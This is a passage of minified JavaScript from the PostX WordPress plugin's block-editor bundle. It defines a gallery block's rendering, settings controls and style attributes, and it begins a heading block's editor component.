ultp-gallery-${u}`},I.map(((e,t)=>(0,a.createElement)("div",{key:e?.id,id:`img-${t}`,"data-id":e?.id,"data-index":t,className:"ultp-gallery-item","data-tag":e?.tag?.join(","),"data-caption":e?.caption?.length>0?e?.caption:"",style:{position:"masonry"==u?"absolute":"relative"}},(0,a.createElement)("div",{className:`ultp-gallery-media ultp-action-${_} ${s?`ultp-caption-${T} ultp-caption-${C}`:""}`},(0,a.createElement)("div",{className:"ultp-gallery-media__img-container"},(0,a.createElement)("div",{className:`ultp-image-block ultp-block-image-${S} ultp-gallery-${E}`},(0,a.createElement)("img",{loading:d?"lazy":"",src:e?.sizes[P]&&e?.sizes[P]?.url?e?.sizes[P]?.url:e?.url,alt:e.alt}))),s&&e.caption?.length>0&&(0,a.createElement)("div",{className:"ultp-gallery-media__caption-container"},(0,a.createElement)("div",{className:"ultp-gallery-media__caption"},e.caption)),(0,a.createElement)("div",{className:`ultp-gallery-action-container ultp-action-${x}`},(0,a.createElement)("div",{className:"ultp-gallery-action"},f&&(0,a.createElement)("a",{href:e?.url,download:e?.url},"_ultp_gl_ic_download_line_ultp_gl_ic_end_"),k&&p&&(0,a.createElement)("div",{className:"ultp-gallery-lightbox","data-index":t,"data-id":e.id,"data-img":e?.url},"_ultp_gl_ic_plus_ultp_gl_ic_end_"),w&&e?.link?.length>0&&(0,a.createElement)("a",{href:e?.link,target:e?.newTab?"_blank":"_self"},"_ultp_gl_ic_link_ultp_gl_ic_end_")))))))),m&&g?.length>0&&(0,a.createElement)("div",{className:"ultp-gallery-loadMore",dangerouslySetInnerHTML:{__html:g}})))}},65638:(e,t,l)=>{"use strict";l.d(t,{Z:()=>y});var o=l(67294),a=l(53049),i=l(87763),n=l(92637),r=l(43581),s=l(31760),p=l(49540);const{__}=wp.i18n,{Toolbar:c}=wp.components,{InspectorControls:u}=wp.blockEditor,{MediaUpload:d,BlockControls:m,MediaUploadCheck:g}=wp.blockEditor,y=({store:e,images:t,handleAddMedia:l})=>{const{tagStorage:y,imageList:b}=e?.attributes,v=y&&JSON.parse(y)?.length>0?JSON.parse(y)?.sort(((e,t)=>e.value-t.value)).map((e=>({value:`${e}`,label:__(`${e}`,"ultimate-post")}))):[];return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(m,null,(0,o.createElement)(c,{className:"ultp-gallery-toolbar-group ultp-menu-toolbar-group"},(0,o.createElement)(g,null,(0,o.createElement)(d,{gallery:!0,multiple:!0,onSelect:l,allowedTypes:["image"],value:JSON.parse(b).map((e=>e?.id?e?.id:"")),render:({open:e})=>(0,o.createElement)("div",{className:"ultp-menu-toolbar-add-item",onClick:e},i.Z.plus,(0,o.createElement)("div",{className:"__label"},__("Add Item","ultimate-post")))})))),(0,o.createElement)(u,null,(0,o.createElement)(r.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid8951",store:e}),(0,o.createElement)(n.Sections,null,(0,o.createElement)(n.Section,{slug:"settings",title:__("Settings","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"group",key:"galleryType",options:[{label:"Grid",value:"grid"},{label:"Tiled",value:"tiled"},{label:"Masonry",value:"masonry"}],justify:!0,label:__("Gallery Type","ultimate-post"),help:__("Tiled & Masonry Depend on Image width","ultimate-post")}},{position:2,data:{type:"range",key:"galleryColumn",label:__("Gallery Column","ultimate-post"),min:1,max:12,step:1,unit:!1,responsive:!0}},{position:3,data:{type:"range",key:"galleryColumnGap",label:__("Gap","ultimate-post"),min:0,max:100,step:1,unit:!1,responsive:!0}},{position:4,data:{type:"select",key:"imgSize",label:__("Image Size","ultimate-post"),options:[{value:"full",label:__("Full Size","ultimate-post")},{value:"thumbnail",label:__("Thumbnail","ultimate-post")},{value:"medium",label:__("Medium","ultimate-post")},{value:"large",label:__("Large","ultimate-post")}]}},{position:5,data:{type:"toggle",key:"lazyLoading",label:__("Lazy Loading","ultimate-post")}},{position:6,data:{type:"range",key:"glImgHeight",min:0,max:1200,step:1,unit:!1,responsive:!0,label:__("Image Height","ultimate-post")}}],initialOpen:!0,store:e}),(0,o.createElement)(p.Z,{store:e,attr:e.attributes,setAttributes:e.setAttributes,images:t}),(0,o.createElement)(a.T,{depend:"captionEnable",title:__("Caption","ultimate-post"),include:[{position:2,data:{type:"select",key:"captionPosition",label:__("Caption Position","ultimate-post"),options:[{value:"top",label:__("Image on Top","ultimate-post")},{value:"middle",label:__("Image on Middle","ultimate-post")},{value:"bottom",label:__("Image on Bottom","ultimate-post")},{value:"outside-below",label:__("Outside Below Image","ultimate-post")},{value:"outside-top",label:__("Outside Top Image","ultimate-post")}]}},{position:3,data:{type:"select",key:"captionDisplayType",label:__("Display Type","ultimate-post"),options:[{value:"onHover",label:__("Show on Hover","ultimate-post")},{value:"visible",label:__("Always Visible","ultimate-post")},{value:"offHover",label:__("Hide on hover","ultimate-post")}]}},{position:4,data:{type:"alignment",disableJustify:!0,key:"captionAlignment",label:__("Alignment ( Conditional with Position )","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{depend:"enableLightBoxOnImg",title:__("Lightbox","ultimate-post"),include:[{position:2,data:{type:"toggle",key:"displayCaption",label:__("Display Captions","ultimate-post")}},{position:3,data:{type:"toggle",key:"displayThumbnail",label:__("Display Thumbnails","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Filter ( Pro )","ultimate-post"),include:[{position:1,data:{pro:!0,type:"toggle",key:"filterEnable",label:__("Enable Filter","ultimate-post")}},{position:2,data:{type:"toggle",key:"enableAllText",label:__('Enable "All"',"ultimate-post")}},{position:3,data:{type:"text",key:"allText",label:__('"All" Text',"ultimate-post")}},{position:4,data:{type:"select",key:"defaultSelectedFilter",label:__("Default Selected Filter","ultimate-post"),options:v?.length>0?v:[]}},{position:5,data:{type:"text",key:"notFoundContent",label:__("Not Found Content","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{depend:"enableLoadMore",title:__("Load More","ultimate-post"),include:[{position:2,data:{type:"range",key:"postPerPageCount",min:0,max:20,step:1,responsive:!0,label:__("Post Per Page Count","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Action","ultimate-post"),include:[{position:1,data:{type:"toggle",key:"enableLink",label:__("Enable Link","ultimate-post")}},{position:2,data:{type:"toggle",key:"enableLightBox",help:"Need To Enable Lightbox Settings",label:__("Enable Light Box","ultimate-post")}},{position:3,data:{type:"toggle",key:"enableDownload",label:__("Enable Download","ultimate-post")}},{position:4,data:{type:"select",key:"actionPosition",label:__("Position","ultimate-post"),options:[{value:"top",label:__("Image on Top","ultimate-post")},{value:"middle",label:__("Image on Middle","ultimate-post")},{value:"bottom",label:__("Image on Bottom","ultimate-post")},{value:"outside-below",label:__("Outside Below Image","ultimate-post")},{value:"outside-top",label:__("Outside Top Image","ultimate-post")}]}},{position:5,data:{type:"select",key:"actionDisplayType",label:__("Display Type","ultimate-post"),options:[{value:"onHover",label:__("Show on Hover","ultimate-post")},{value:"visible",label:__("Always Visible","ultimate-post")},{value:"offHover",label:__("Hide on hover","ultimate-post")}]}},{position:6,data:{type:"alignment",key:"actionAlignment",disableJustify:!0,label:__("Alignment ( Conditional with Position )","ultimate-post")}}],initialOpen:!1,store:e})),(0,o.createElement)(n.Section,{slug:"style",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{title:__("Images","ultimate-post"),include:[{position:2,data:{type:"select",key:"imgAnimation",label:__("Image Hover","ultimate-post"),options:[{value:"",label:__("No Animation","ultimate-post")},{value:"zoomIn",label:__("Zoom In","ultimate-post")},{value:"zoomOut",label:__("Zoom Out","ultimate-post")},{value:"opacity",label:__("Opacity","ultimate-post")},{value:"roateLeft",label:__("Rotate Left","ultimate-post")},{value:"rotateRight",label:__("Rotate Right","ultimate-post")},{value:"slideLeft",label:__("Slide Left","ultimate-post")},{value:"slideRight",label:__("Slide Right","ultimate-post")}]}},{position:3,data:{type:"select",key:"imgEffect",label:__("Image Effect","ultimate-post"),options:[{value:"",label:__("None","ultimate-post")},{value:"grayscale",label:__("Grayscale","ultimate-post")},{value:"sepia",label:__("Sepia","ultimate-post")},{value:"saturate",label:__("Saturate","ultimate-post")},{value:"opacity",label:__("Opacity","ultimate-post")},{value:"vintage",label:__("Vintage","ultimate-post")},{value:"earlybird",label:__("Earlybird","ultimate-post")},{value:"toaster",label:__("Toaster","ultimate-post")},{value:"myfair",label:__("Myfair","ultimate-post")}]}},{position:4,data:{type:"border",key:"imgBorder",label:__("Border","ultimate-post")}},{position:5,data:{type:"dimension",key:"imgRadius",step:1,unit:!0,responsive:!0,label:__("Image Border Radius","ultimate-post")}},{position:6,data:{type:"boxshadow",key:"imgShadow",step:1,unit:!0,responsive:!0,label:__("Image Box shadow","ultimate-post")}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("Caption Style","ultimate-post"),include:[{position:1,data:{type:"typography",key:"captionTypography",label:__("Typography","ultimate-post")}},{position:2,data:{type:"color",key:"captionColor",label:__("Color","ultimate-post")}},{position:3,data:{type:"color",key:"captionOverlayBg",label:__("Overlay Background","ultimate-post")}},{position:4,data:{type:"dimension",key:"captionPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Action","ultimate-post"),include:[{position:1,data:{type:"range",key:"actionIconSize",label:__("Icon Size","ultimate-post"),min:1,max:120,step:1,unit:!1,responsive:!0}},{position:2,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"actionColor",label:__("Color","ultimate-post")},{type:"color",key:"actionBg",label:__("Background","ultimate-post")},{type:"border",key:"actionBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"actionRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"actionHoverColor",label:__("Color","ultimate-post")},{type:"color",key:"actionHoverBg",label:__("Background","ultimate-post")},{type:"border",key:"actionHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"actionHoverRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]}]}},{position:3,data:{type:"dimension",key:"actionPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:4,data:{type:"dimension",key:"actionMargin",step:1,unit:!0,responsive:!0,label:__("Margin","ultimate-post")}},{position:5,data:{type:"range",key:"actionSpaceBetween",min:0,max:100,step:1,responsive:!0,label:__("Spacing Between","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Load More","ultimate-post"),include:[{position:1,data:{type:"typography",key:"loadMoreTypo",label:__("Typography","ultimate-post")}},{position:2,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"loadMoreColor",label:__("Color","ultimate-post")},{type:"color",key:"loadMoreBg",label:__("Background","ultimate-post")},{type:"border",key:"loadMoreBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"loadMoreRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"loadMoreHoverColor",label:__("Color","ultimate-post")},{type:"color",key:"loadMoreHoverBg",label:__("Background","ultimate-post")},{type:"border",key:"loadMoreHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"loadMoreHoverRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]}]}},{position:3,data:{type:"dimension",key:"loadMorePadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:4,data:{type:"range",key:"loadMoreSpacing",min:0,max:100,step:1,responsive:!0,label:__("Spacing Between","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Filter (Pro) Style","ultimate-post"),include:[{position:1,data:{type:"typography",key:"filterTypography",label:__("Typography","ultimate-post")}},{position:2,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"filterColor",label:__("Color","ultimate-post")},{type:"color",key:"filterBg",label:__("Background","ultimate-post")},{type:"border",key:"filterBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"filterRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"filterShadow",step:1,unit:!0,responsive:!0,label:__("Box Shadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"filterHoverColor",label:__("Color","ultimate-post")},{type:"color",key:"filterHoverBg",label:__("Background","ultimate-post")},{type:"border",key:"filterHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"filterHoverRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"filterHoverShadow",step:1,unit:!0,responsive:!0,label:__("Box Shadow","ultimate-post")}]}]}},{position:2,data:{type:"dimension",key:"filterPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:3,data:{type:"dimension",key:"filterMargin",step:1,unit:!0,responsive:!0,label:__("Margin","ultimate-post")}},{position:4,data:{type:"range",key:"filterGap",label:__("Gap","ultimate-post"),min:0,max:100,step:1,unit:!1,responsive:!0}},{position:5,data:{type:"alignment",disableJustify:!0,key:"filterAlignment",label:__("Alignment","ultimate-post")}}],initialOpen:!1,store:e})),(0,o.createElement)(n.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e})))),(0,o.createElement)(s.Z,{include:[{type:"template"}],store:e}))}},50315:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={customCssVariable:{type:"string",default:""},blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},galleryType:{type:"string",default:"grid"},imageList:{type:"string",default:"[]"},tagStorage:{type:"string",default:"[]"},pageListData:{type:"string",default:"[]"},galleryColumn:{type:"object",default:{lg:"3",sm:"2"},style:[{depends:[{key:"galleryType",condition:"==",value:"grid"}],selector:"{{ULTP}} .ultp-gallery-grid { grid-template-columns: repeat({{galleryColumn}}, 1fr); --ultp-gallery-columns: {{galleryColumn}};   }"},{depends:[{key:"galleryType",condition:"==",value:"masonry"}],selector:"{{ULTP}} .ultp-gallery-container { --ultp-gallery-columns: {{galleryColumn}}; }"},{depends:[{key:"galleryType",condition:"==",value:"tiled"}],selector:"{{ULTP}} .ultp-gallery-container { --ultp-gallery-columns: {{galleryColumn}}; }"}]},galleryColumnGap:{type:"object",default:{lg:"20"},style:[{depends:[{key:"galleryType",condition:"==",value:"grid"}],selector:"{{ULTP}} .ultp-gallery-grid { gap: {{galleryColumnGap}}px }"},{depends:[{key:"galleryType",condition:"==",value:"masonry"}],selector:"{{ULTP}} .ultp-gallery-container { --ultp-gallery-gap: {{galleryColumnGap}}; }"},{depends:[{key:"galleryType",condition:"==",value:"tiled"}],selector:"{{ULTP}} .ultp-gallery-container { --ultp-gallery-gap: {{galleryColumnGap}}; }"}]},imgSize:{type:"string",default:"full"},clickEvent:{type:"string",default:""},lazyLoading:{type:"boolean",default:!1},glImgHeight:{type:"object",default:{lg:"400"},style:[{depends:[{key:"galleryType",condition:"!=",value:"masonry"}],selector:"{{ULTP}} .ultp-gallery-item { height: {{glImgHeight}}px;  } {{ULTP}} .ultp-gallery-container { --ultp-gallery-height: {{glImgHeight}}; } "}]},captionEnable:{type:"boolean",default:!1},captionPosition:{type:"string",default:"bottom"},captionDisplayType:{type:"string",default:"visible"},captionAlignment:{type:"string",default:"center",style:[{depends:[{key:"captionAlignment",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-gallery-media__caption { justify-content: flex-start; }"},{depends:[{key:"captionAlignment",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-gallery-media__caption { justify-content: center; }"},{depends:[{key:"captionAlignment",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-gallery-media__caption { justify-content: flex-end; }"}]},enableLightBoxOnImg:{type:"boolean",default:!1},displayImageCount:{type:"object",default:{lg:"1"}},displayCaption:{type:"boolean",default:!1},displayThumbnail:{type:"boolean",default:!0},filterEnable:{type:"boolean",default:!1},enableAllText:{type:"boolean",default:!0},allText:{type:"string",default:"All"},defaultSelectedFilter:{type:"string",default:""},notFoundContent:{type:"string",default:"Image Not Found! Try Again"},enableLoadMore:{type:"boolean",default:!0},loadMoreText:{type:"string",default:"Load More"},postPerPageCount:{type:"object",default:{lg:"9"},style:[{depends:[{key:"enableLoadMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-gallery-loadMore { --ultp-gallery-count: {{postPerPageCount}}; }"}]},enableLink:{type:"boolean",default:!1},enableLightBox:{type:"boolean",default:!1},enableDownload:{type:"boolean",default:!1},actionPosition:{type:"string",default:"top"},actionDisplayType:{type:"string",default:"onHover"},actionAlignment:{type:"string",default:"left",style:[{depends:[{key:"actionAlignment",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-gallery-action { justify-content: flex-start; }"},{depends:[{key:"actionAlignment",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-gallery-action { justify-content: center; }"},{depends:[{key:"actionAlignment",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-gallery-action { justify-content: flex-end; }"}]},imgAnimation:{type:"string",default:""},imgEffect:{type:"string",default:""},imgBorder:{type:"border",default:{openBorder:0,disableColor:!0,width:{top:0,right:0,bottom:0,left:0},type:"solid"},style:[{selector:"{{ULTP}} .ultp-gallery-media__img-container"}]},imgRadius:{type:"object",default:{lg:"0",unit:"px"},style:[{selector:"{{ULTP}} .ultp-gallery-media__img-container, {{ULTP}} .ultp-gallery-media__img-container .ultp-image-block, {{ULTP}} .ultp-gallery-item .ultp-gallery-media { border-radius:{{imgRadius}}; overflow: hidden; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-gallery-item .ultp-gallery-media__img-container"}]},captionTypography:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{selector:"{{ULTP}} .ultp-gallery-media__caption"}]},captionColor:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} .ultp-gallery-media__caption { color: {{captionColor}}; }"}]},captionOverlayBg:{type:"string",default:"#0000009E",style:[{selector:"{{ULTP}} .ultp-gallery-media__caption { background: {{captionOverlayBg}}; }"}]},captionPadding:{type:"object",default:{lg:{top:13,bottom:13,left:19,right:19,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-gallery-media__caption { padding: {{captionPadding}}; box-sizing: border-box; }"}]},actionIconSize:{type:"object",default:{lg:"14",unit:"px"},style:[{selector:"{{ULTP}} .ultp-gallery-action svg { height: {{actionIconSize}}; width: {{actionIconSize}}; }"}]},actionColor:{type:"string",default:"#000",style:[{selector:"{{ULTP}} .ultp-gallery-action svg { color: {{actionColor}}; }"}]},actionBg:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} .ultp-gallery-action svg { background: {{actionBg}}; }"}]},actionBorder:{type:"object",default:{openBorder:0,disableColor:!0,width:{top:0,right:0,bottom:0,left:0},type:"solid"},style:[{selector:"{{ULTP}} .ultp-gallery-action svg"}]},actionRadius:{type:"object",default:{lg:"2",unit:"px"},style:[{selector:"{{ULTP}} .ultp-gallery-action svg { border-radius:{{actionRadius}}; }"}]},actionHoverColor:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} .ultp-gallery-action svg:hover { color: {{actionHoverColor}}; }"}]},actionHoverBg:{type:"string",default:"#037FFF",style:[{selector:"{{ULTP}} .ultp-gallery-action svg:hover { background: {{actionHoverBg}}; }"}]},actionHoverBorder:{type:"object",default:{openBorder:0,disableColor:!0,width:{top:0,right:0,bottom:0,left:0},type:"solid"},style:[{selector:"{{ULTP}} .ultp-gallery-action svg:hover"}]},actionHoverRadius:{type:"object",default:{lg:"2",unit:"px"},style:[{selector:"{{ULTP}} .ultp-gallery-action svg:hover { border-radius:{{actionHoverRadius}}; }"}]},actionPadding:{type:"object",default:{lg:{top:4,bottom:4,left:4,right:4,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-gallery-action svg { padding:{{actionPadding}}; }"}]},actionMargin:{type:"object",default:{lg:{top:20,bottom:0,left:20,right:0,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-gallery-action { padding:{{actionMargin}}; box-sizing: border-box; }"}]},actionSpaceBetween:{type:"object",default:{lg:"4",unit:"px"},style:[{selector:"{{ULTP}} .ultp-gallery-action { gap: {{actionSpaceBetween}}; }"}]},loadMoreTypo:{type:"object",default:{openTypography:1,size:{lg:"16",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"16",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{selector:"{{ULTP}} .ultp-gallery-loadMore"}]},loadMoreColor:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} .ultp-gallery-loadMore { color: {{loadMoreColor}}; }"}]},loadMoreBg:{type:"string",default:"#23374D",style:[{selector:"{{ULTP}} .ultp-gallery-loadMore { background-color: {{loadMoreBg}}; }"}]},loadMoreBorder:{type:"border",default:{openBorder:0,disableColor:!0,width:{top:0,right:0,bottom:0,left:0},type:"solid"},style:[{selector:"{{ULTP}} .ultp-gallery-loadMore"}]},loadMoreRadius:{type:"object",default:{lg:"4",unit:"px"},style:[{selector:"{{ULTP}} .ultp-gallery-loadMore { border-radius:{{loadMoreRadius}}; }"}]},loadMoreHoverColor:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} .ultp-gallery-loadMore:hover { color: {{loadMoreHoverColor}}; }"}]},loadMoreHoverBg:{type:"string",default:"#1089FF",style:[{selector:"{{ULTP}} .ultp-gallery-loadMore:hover { background-color: {{loadMoreHoverBg}}; }"}]},loadMoreHoverBorder:{type:"border",default:{openBorder:0,disableColor:!0,width:{top:0,right:0,bottom:0,left:0},type:"solid"},style:[{selector:"{{ULTP}} .ultp-gallery-loadMore"}]},loadMoreHoverRadius:{type:"object",default:{lg:"4",unit:"px"},style:[{selector:"{{ULTP}} .ultp-gallery-loadMore:hover { border-radius:{{loadMoreHoverRadius}}; }"}]},loadMorePadding:{type:"object",default:{lg:{top:13,bottom:13,left:32,right:32,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-gallery-loadMore { padding: {{loadMorePadding}}; box-sizing: border-box; }"}]},loadMoreSpacing:{type:"object",default:{lg:"58",unit:"px"},style:[{selector:"{{ULTP}}  .ultp-gallery-loadMore { margin-top:{{loadMoreSpacing}};}"}]},filterTypography:{type:"object",default:{openTypography:1,size:{lg:"16",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"16",unit:"px"},decoration:"none",transform:"Capitalize",family:"",weight:"500"},style:[{selector:"{{ULTP}} .ultp-gallery-filter__item"}]},filterColor:{type:"string",default:"#1089FF",style:[{selector:"{{ULTP}} .ultp-gallery-filter__item { color: {{filterColor}}; }"}]},filterBg:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} .ultp-gallery-filter__item { background: {{filterBg}}; }"}]},filterBorder:{type:"border",default:{openBorder:1,disableColor:!0,width:{top:1,right:1,bottom:1,left:1},type:"solid",color:"#1089FF"},style:[{selector:"{{ULTP}} .ultp-gallery-filter__item"}]},filterRadius:{type:"object",default:{lg:"40",unit:"px"},style:[{selector:"{{ULTP}} .ultp-gallery-filter__item { border-radius:{{filterRadius}} }"}]},filterShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-gallery-filter__item"}]},filterHoverColor:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} .ultp-gallery-filter__item:hover, {{ULTP}} .ultp-gallery-filter__item.active-gallery-filter { color: {{filterHoverColor}}; }"}]},filterHoverBg:{type:"string",default:"#1089FF",style:[{selector:"{{ULTP}} .ultp-gallery-filter__item:hover, {{ULTP}} .ultp-gallery-filter__item.active-gallery-filter { background: {{filterHoverBg}}; }"}]},filterHoverBorder:{type:"border",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},type:"solid",color:"#1089FF"},style:[{selector:"{{ULTP}} .ultp-gallery-filter__item:hover, {{ULTP}} .ultp-gallery-filter__item.active-gallery-filter"}]},filterHoverRadius:{type:"object",default:{lg:"40",unit:"px"},style:[{selector:"{{ULTP}} .ultp-gallery-filter__item:hover, {{ULTP}} .ultp-gallery-filter__item.active-gallery-filter { border-radius:{{filterHoverRadius}} }"}]},filterHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-gallery-filter__item:hover, {{ULTP}} .ultp-gallery-filter__item.active-gallery-filter"}]},filterPadding:{type:"object",default:{lg:{top:10,bottom:10,left:24,right:24,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-gallery-filter__item { padding: {{filterPadding}}; box-sizing: border-box; }"}]},filterMargin:{type:"object",default:{lg:{top:0,bottom:40,left:0,right:0,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-gallery-filter { margin: {{filterMargin}}; }"}]},filterGap:{type:"object",default:{lg:"16",unit:"px"},style:[{selector:"{{ULTP}} .ultp-gallery-filter { gap: {{filterGap}}; }"}]},filterAlignment:{type:"string",default:"center",style:[{depends:[{key:"filterAlignment",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-gallery-filter { justify-content: flex-start; }"},{depends:[{key:"filterAlignment",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-gallery-filter { justify-content: center; }"},{depends:[{key:"filterAlignment",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-gallery-filter { justify-content: flex-end; }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-wrapper {z-index: {{advanceZindex}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},77794:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(35343),n=l(82110),r=l(50315),s=l(83408);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks,c=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/postx-gallery-block/","block_docs");p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/gallery.svg",alt:"PostX Gallery"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Display images with the ultimate controls.","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:c},__("Documentation","ultimate-post"))),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/gallery.svg"}},edit:i.Z,save:n.Z})},58065:(e,t,l)=>{"use strict";l.d(t,{Z:()=>y});var o=l(67294),a=l(53049),i=l(99838),n=l(92637),r=l(25335);const{__}=wp.i18n,{InspectorControls:s,useBlockProps:p}=wp.blockEditor,{useEffect:c,useState:u,Fragment:d}=wp.element,{getBlockAttributes:m,getBlockRootClientId:g}=wp.data.select("core/block-editor");function y(e){const[t,l]=u("Content"),{setAttributes:y,name:b,attributes:v,clientId:h,className:f,attributes:{blockId:k,advanceId:w,headingText:x,headingStyle:T,headingAlign:_,headingURL:C,headingBtnText:E,subHeadingShow:S,subHeadingText:P,headingTag:L,dcEnabled:I,dcText:B,currentPostId:U}}=e;c((()=>{const e=h.substr(0,6),t=m(g(h));(0,a.qi)(y,t,U,h),k?k&&k!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||y({blockId:e})):y({blockId:e})}),[h]);const M={setAttributes:y,name:b,attributes:v,setSection:l,section:t,clientId:h};let A;k&&(A=(0,i.Kh)(v,"ultimate-post/heading",k,(0,a.k0)()));const H=p({...w&&{id:w},className:`ultp-block-${k} ${f}`});return(0,o.createElement)(d,null,(0,o.createElement)(s,null,(0,o.createElement)(n.Sections,null,(0,o.createElement)(n.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.Wh,{include:[{position:6,data:{type:"toggle",key:"openInTab",label:__("Links Open in New Tabs","ultimate-post")}}],initialOpen:!0,store:M})),(0,o.createElement)(n.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:M}),(0,o.createElement)(a.Mg,{store:M}),(0,o.createElement)(a.iv,{store:M}))),(0,a.dH)()),(0,o.createElement)("div",H,A&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:A}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)(r.Z,{props:{headingShow:!0,headingStyle:T,headingAlign:_,headingURL:C,headingText:x,setAttributes:y,headingBtnText:E,subHeadingShow:S,subHeadingText:P,headingTag:L,dcEnabled:I,dcText:B}}))))}},6534:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(92165);const a={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},headingText:{type:"string",default:"This is a Heading Example"},headingURL:{type:"string",default:""},openInTab:{type:"boolean",default:!1},headingBtnText:{type:"string",default:"View 